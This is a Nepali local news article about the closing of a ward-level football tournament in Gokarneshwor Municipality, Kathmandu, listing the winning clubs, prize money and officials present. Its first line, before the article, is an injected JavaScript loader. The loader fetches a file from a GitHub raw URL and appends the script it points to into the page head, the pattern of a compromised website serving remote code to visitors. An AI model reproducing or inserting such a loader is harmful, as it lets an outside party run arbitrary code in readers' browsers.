;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्युज, काठमाडौँ |
काठमाडौँ गोकर्णेश्वर नगरपालिका वडा नं ७ मा अबस्थित दक्षिणढोका उत्थान युवा क्लबले आयोजना गरेको दोश्रो वडा अध्यक्ष कप र चौथो लाक्पा स्मृति कप फुटबल प्रतियोगिता आज सम्पन्न भएको छ |
खेलमा जम्मा २१ टिम सहभागी रहेका थिए | २१ टिमलाइ हराउदै मध्यपुर थिमी क्लबले प्रथम स्थान हासिल गरेको छ भने दक्षिणढोका उत्थान युवा क्लबले दोश्रो स्थान हासिल गरेका छन् |प्रथम हुने र दोश्रो हुने टिमलाइ क्रमश १ लाख र ५० हजार पुरस्कारको साथमा सिल मेडल र प्रमाणपत्र प्रदान गरिएको थियो |
पौष ९ गते देखि गरिएको फुटबल प्रतियोगिता आज २१ गते गोकर्णेश्वर नगरपालिकाका मेयर दिपक रिसालको उपस्थितिमा सम्पन्न भएको हो |
समापन कार्यक्रममा सोहि वडाका वडा अध्यक्ष केशब गुरुङ, गोकर्णेश्वर नगरपालिका युवा तथा खेलकुद बिकाश समितिका अध्यक्ष संजय लामा, वडा सदस्यहरु समेतको उपस्थितिमा खेलाडीहरुलाई पुरस्कार दिई सम्पन्न भएको क्लबका अध्यक्ष राजेश लामा जिम्बाले बताएका छन् |
सो कार्यक्रमको संयोजक मुन्ना शेर्पा रहेका थिए |
फेसबुक प्रतिक्रियाहरु